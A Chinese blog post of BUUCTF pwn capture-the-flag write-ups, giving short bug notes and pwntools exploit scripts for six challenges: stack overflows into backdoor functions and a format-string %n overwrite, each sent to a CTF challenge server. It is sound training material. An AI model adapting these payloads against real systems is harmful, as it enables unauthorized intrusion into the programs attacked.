BUU-pwn(一)

已于 2022-04-26 21:09:01 修改
阅读量305 收藏 1
点赞数
分类专栏: pwn 文章标签: wp
于 2022-04-24 00:40:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53263789/article/details/123927104
版权

rip

简单栈溢出,后门函数
exp

from pwn import *
#io=process("./pwn")
r = remote('node4.buuoj.cn',25253)

payload=b'a'*0xf+b'a'*0x08+p64(0x0401187)
r.sendline(payload)
r.interactive()

warmup_csaw_2016

后门函数 int sub_40060D() 泄露地址
exp

from pwn import *
#io=process("./pwn")
r = remote('node4.buuoj.cn',29416)
r.recvuntil('WOW:')

addr = int(r.recv(8),16)
print(addr)
payload=b'a'*0x40+b'a'*0x8+p64(addr)
r.sendlineafter('>',payload)
r.interactive()

ciscn_2019_n_1

在这里插入图片描述
使用 IEEE 754浮点数十六进制相互转换 转换地址
exp

from pwn import *
#io=process("./pwn")
r = remote('node4.buuoj.cn',25891)

payload=b'a'*(0x30-0x4)+p64(0x41348000)
r.sendlineafter('Let\'s guess the number.',payload)
r.interactive()

pwn1_sctf_2016

有后门函数
s开辟了3C空间,但是fgets只能读32字节,最后的strcpy利用之间的将 I 转为 you 长度直接变大造成溢出
在这里插入图片描述
exp

from pwn import *
#io=process("./pwn")
r = remote('node4.buuoj.cn',28969)
#0x14 = 20字节长度
payload=b'I'*(0x14)+b'a'*0x4+p32(0x8048f0d)
r.sendline(payload)
r.interactive()

jarvisoj_level0

from pwn import *
#io=process("./pwn")
r = remote('node4.buuoj.cn',27802)

payload=b'a'*(0x80)+b'a'*0x8+p64(0x0400596)
r.sendlineafter('Hello, World\n',payload)
r.interactive()

[第五空间2019 决赛]PWN5

格式化控制passwd

偏移量为10

passwd地址为 0804C044 长度为 4
在这里插入图片描述

from pwn import *
#io=process("./pwn")
r = remote('node4.buuoj.cn',25323)

payload=p32(0x804c044)+p32(0x804c045)+p32(0x804c046)+p32(0x804c047)
payload+=b'%10$n%11$n%12$n%13$n'

r.sendline(payload)
r.sendline(str(0x10101010))
r.interactive()
Ff.cheng
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF之PWN(WP1)
NANMUZN的博客
01-15 632
buuctf pwn
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 388
buuctf pwn 第三页
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1044
buuctf pwn
buuctf习题pwn(2~10)
yw__y的博客
03-30 959
[每日一PWN]BUUCTF PWN5
qq_55233040的博客
11-28 352
遇到了buupwn题中按顺序的第一道格式化字符串漏洞的题目,难度稍有提升。
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
joinUs-buu2018:h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信/qq分享 #预览地址
BUU刷题-Pwn-test
一个啥也不会的小菜鸡!
07-13 56
直接执行即可,获得主机权限!
buu pwn入门 有栈溢出
Sanntaa的博客
12-03 608
写题笔记
BUU刷题-Pwn-bjdctf_2020_babystack
一个啥也不会的小菜鸡!
06-21 189
首先利用&nbytes变量控制溢出长度,再使用buf实现溢出就可以了。后门函数地址:backdoor:0x4006E6。
buu_pwn
王富贵同学的博客
09-29 1998
warmup_csaw_2016 明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d
BUU-pwn(二)
qq_53263789的博客
04-27 310
ciscn_2019_n_8 32位程序,逻辑很简单 需要var[13] == 17 需要注意的是qword全称是Quad Word。2个字节就是1个Word(1个字,16位),q就是英文quad-这个词根(意思是4)的首字母,所以它自然是word(2字节,0~2^16-1)的四倍,8字节 所以用p64 exp from pwn import * r = remote('node4.buuoj.cn',29396) payload = b'aaaa'*13+p64(0x11) r.sendline(p
BUU PWN(一)
playmaker的博客
01-28 2106
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
buupwn1_sctf_2016
xieyichensss的博客
03-18 718
**(学生党太菜了)** pwn_sctf_2016 1.拿到文件,首先checksec并file一下。 发现NX打开了,哦 糟糕.不过不慌,我们下一步打开IDA看一哈 2.用32位的IDA打开他,反汇编一下。双击vuln()函数。 得到这一大堆我看不懂的东西,不过我看到最后有strcpy函数,知道是一个栈溢出的问题。s的大小为0h3c,且函数中出现I和you,着重分析他俩(经过一系列的百度)。得到最后是用you代替I,这样输入20个I就可以溢出到ebp了。 3.我又在全部函数中找啊找,发现...
buu-pwn-heap刷题日记
abelxu
10-25 1089
一开始的题解忘记记录题解了。每天刷两道pwn题 babyfengshui_33c3_2016 https://blog.csdn.net/qinying001/article/details/104359401 漏洞点在Update函数的比较部分。将des_addr+length和Node_addr - 4进行比较。 [V&N2020 公开赛]simpleHeap https://blog.csdn.net/qq_39869547/article/details/104587504 https://
BUU PWN (二)
playmaker的博客
02-07 825
BUU PWN (二) level0 from pwn import * #p=process('./level0') p=remote("node3.buuoj.cn","26684") p.recvline() payload='a'*0x80+'a'*8+p64(0x400596) p.sendline(payload) p.interactive() ciscn_2019_n_5 ret...
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。 在解密Quoted-printable编码时,我们可以使用在线工具来帮助我们。一个可以使用的工具是[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。 根据提供的信息,得到的flag是"flag{那你也很棒哦}"。 总结:Quoted-printable是一种常见的邮件编码方法,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。根据提供的信息,得到的flag是"flag{那你也很棒哦}"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值